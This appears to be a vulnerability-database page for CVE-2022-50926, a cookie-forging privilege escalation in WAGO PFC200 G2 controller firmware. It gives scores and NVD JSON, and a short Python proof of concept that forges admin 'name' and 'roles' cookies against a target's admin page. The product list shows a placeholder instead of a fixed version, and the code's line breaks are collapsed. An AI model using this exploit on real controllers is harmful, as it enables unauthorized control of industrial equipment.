Security Vulnerability Report
中文
CVE-2022-50926 CVSS 9.8 CRITICAL

CVE-2022-50926

Published: 2026-01-13 23:15:57
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

WAGO 750-8212 PFC200 G2 2ETH RS firmware contains a privilege escalation vulnerability that allows attackers to manipulate user session cookies. Attackers can modify the cookie's 'name' and 'roles' parameters to elevate from ordinary user to administrative privileges without authentication.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WAGO 750-8212 PFC200 G2 2ETH RS firmware < 修复版本
WAGO PFC200 G2 系列固件(所有未打补丁版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2022-50926 PoC - WAGO PFC200 G2 Cookie Privilege Escalation # Target: WAGO 750-8212 PFC200 G2 2ETH RS TARGET_IP = "192.168.1.100" TARGET_URL = f"http://{TARGET_IP}" def exploit_privilege_escalation(): """ Exploit CVE-2022-50926 by modifying session cookie parameters to escalate from regular user to admin privileges """ # Step 1: Capture legitimate user session cookie session = requests.Session() # Step 2: Modify cookie 'roles' parameter to admin # Original: roles=user -> Modified: roles=admin modified_cookie = { 'name': 'admin', # Impersonate admin user 'roles': 'admin', # Elevate privileges 'session_id': 'legitimate_session_id' } # Step 3: Send request with modified cookie headers = { 'Cookie': f"name={modified_cookie['name']}; roles={modified_cookie['roles']}; session_id={modified_cookie['session_id']}" } response = session.get(f"{TARGET_URL}/admin/settings", headers=headers) # Step 4: Verify admin access gained if response.status_code == 200 and 'admin' in response.text.lower(): print("[+] Privilege escalation successful - Admin access obtained") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": exploit_privilege_escalation()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50926", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:56.870", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WAGO 750-8212 PFC200 G2 2ETH RS firmware contains a privilege escalation vulnerability that allows attackers to manipulate user session cookies. Attackers can modify the cookie's 'name' and 'roles' parameters to elevate from ordinary user to administrative privileges without authentication."}, {"lang": "es", "value": "El firmware WAGO 750-8212 PFC200 G2 2ETH RS contiene una vulnerabilidad de escalada de privilegios que permite a los atacantes manipular las cookies de sesión de usuario. Los atacantes pueden modificar los parámetros 'name' y 'roles' de la cookie para elevar de usuario ordinario a privilegios administrativos sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-565"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50793", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wago-pfc-g-eth-rs-privilege-escalation", "source": "[email protected]"}, {"url": "https://www.wago.com", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.